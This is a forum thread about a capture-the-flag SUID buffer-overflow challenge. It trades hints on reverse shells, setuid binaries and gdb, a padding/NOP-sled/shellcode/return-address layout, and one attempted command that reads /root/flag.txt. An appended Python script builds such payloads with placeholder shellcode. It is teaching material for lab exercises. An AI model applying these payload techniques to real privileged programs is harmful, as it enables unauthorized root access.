I think that I may have lost sight of the buffer overflow part now. The information that I have learned about SUID mostly shows abusing the running of particular programs that are part of the Linux system.
I am wary of elaborating on what I have tried, as I don't want to reveal the things that don't work and get in trouble.
The issue I had was not due to my understanding; it was the use of smart quotes in the command I was creating. I was using Cherrytree to assemble all of my code, and the default in Cherrytree is to use smart quotes. Once I removed the wrong characters and changed my quotes to the right ones, it worked. The setting I'm talking about is in Preferences > Special Characters > uncheck Smart Quotes.
I am also stuck on this. I followed all of the stuff that was taught in the tutorial, and I have been reading and watching all different kinds of exploits and have learned a lot, but none of them seem to pertain to this challenge. I note what blueprismo said, but I am not sure what I am missing.
I don't want to give you a direct answer, as it's against the rules. But check these points:
1- did you get a reverse shell = (rs)? How?
2- With this rs, what user are you logged in?
3- you know how sticky bits work, right?
4- find the file with the sticky bit set.
5- remember that when you are inside gdb and run "run $(python -c blablabla)", it's the same as executing the script with the parameter, as follows: ./script $(python -c blablabla)
I can't help you more; check these points and I'm sure you will pass.
Keep me updated.
Hi, could you elaborate on that, please? I got the shell but can't figure out what to do next. Thanks.
You can only debug a setuid or setgid program if the debugger is running as root. The kernel won't let you call ptrace on a program running with extra privileges. If it did, you would be able to make the program execute anything, which would effectively mean you could e.g. run a root shell by calling a debugger on /bin/su.
So you might need to think of another way to get the shellcode triggered outside GDB
Welp, did you get a shell, and with which user? Unprivileged? Then... just think about how you can get a privileged shell. Look at the files inside the home folder. You've got this.
Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
NOPs = "\x90" * 124
Shellcode = "char"
EIP = "\x66" * 4
Can someone explain to me why 124 NOPs are used? Why not more or less than that? Is that chosen randomly, or is there a calculation behind it?
I tried multiple ways, including this: ./leave_msg $(python -c 'import os; os.system("sudo cat /root/flag.txt")') Still not rooted. Can someone please help me out?
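As an added example that is not part of this thread (nothing here is the challenge's leave_msg binary or anyone's posted exploit): a small Python 3 script that builds a payload with the layout from the post above and makes two points explicit. First, the 124 is not computed from anything; the padding is whatever is left once the NOP sled, shellcode and the 4 return-address bytes are subtracted from the fixed 1040-byte frame, so any sled length that still fits works, as long as the overwritten return address lands somewhere inside the sled. Second, it checks the point made earlier about `./script $(python -c ...)`: bash command substitution drops NUL bytes and, unquoted, splits the result on spaces, tabs and newlines, so a payload containing those bytes will not reach the program intact. The 95-byte shellcode is a constructed placeholder of 0xCC bytes, and the return address 0x66666666 is the post's dummy value; both are assumptions for illustration only.

```python
"""Payload layout helper (added example, not from the original thread).

Segments follow the post above: padding + NOP sled + shellcode + EIP = 1040.
"""
import sys

TOTAL_LEN = 1040                        # fixed frame size from the post
PLACEHOLDER_SHELLCODE = b"\xcc" * 95    # constructed stand-in, NOT real shellcode
FAKE_EIP = b"\x66" * 4                  # the post's dummy return address

# Bytes that `$(python -c ...)` cannot deliver intact: NUL is discarded by
# command substitution; tab, newline and space split the unquoted argument.
SHELL_BAD_BYTES = {0x00, 0x09, 0x0a, 0x20}


def padding_len(nop_count, shellcode=PLACEHOLDER_SHELLCODE, eip=FAKE_EIP, total=TOTAL_LEN):
    """Bytes of filler left after the sled, shellcode and EIP are placed."""
    return total - nop_count - len(shellcode) - len(eip)


def fits(nop_count, shellcode=PLACEHOLDER_SHELLCODE, eip=FAKE_EIP, total=TOTAL_LEN):
    """True if the chosen sled length leaves a non-negative amount of padding."""
    return padding_len(nop_count, shellcode, eip, total) >= 0


def build_payload(nop_count, shellcode=PLACEHOLDER_SHELLCODE, eip=FAKE_EIP, total=TOTAL_LEN):
    """padding ('\\x55') + NOP sled ('\\x90') + shellcode + EIP, always `total` bytes."""
    pad = padding_len(nop_count, shellcode, eip, total)
    if pad < 0:
        raise ValueError("sled + shellcode + EIP exceed the %d-byte frame" % total)
    return b"\x55" * pad + b"\x90" * nop_count + shellcode + eip


def layout(nop_count, shellcode=PLACEHOLDER_SHELLCODE, eip=FAKE_EIP, total=TOTAL_LEN):
    """Segment sizes, for eyeballing how padding trades off against the sled."""
    return {
        "padding": padding_len(nop_count, shellcode, eip, total),
        "nops": nop_count,
        "shellcode": len(shellcode),
        "eip": len(eip),
    }


def shell_unsafe_bytes(payload):
    """Sorted list of byte values in `payload` that bash $(...) would drop or split on."""
    return sorted(set(payload) & SHELL_BAD_BYTES)


def sled_covers(ret_addr, sled_start, nop_count):
    """True if a guessed return address lands inside the NOP sled.

    A longer sled widens the window [sled_start, sled_start + nop_count),
    which is the only reason to prefer more NOPs; the count itself is arbitrary.
    """
    return sled_start <= ret_addr < sled_start + nop_count


if __name__ == "__main__":
    if "--raw" in sys.argv:
        # Python 3: print() would emit a repr, so write the raw bytes instead.
        sys.stdout.buffer.write(build_payload(124))
    else:
        for n in (1, 124, 400):
            p = build_payload(n)
            print(n, len(p), layout(n), "bad bytes:", shell_unsafe_bytes(p))
```

Run it as `python3 payload.py` to see that 1, 124 and 400 NOPs all yield a 1040-byte payload with only the padding changing; `python3 payload.py --raw` writes the bytes themselves, which is what you would substitute into `./program "$(...)"`. If `shell_unsafe_bytes` reports anything for real shellcode, pass the payload some other way (a file redirected to stdin, or an environment variable), because the shell will corrupt it before the program ever sees it.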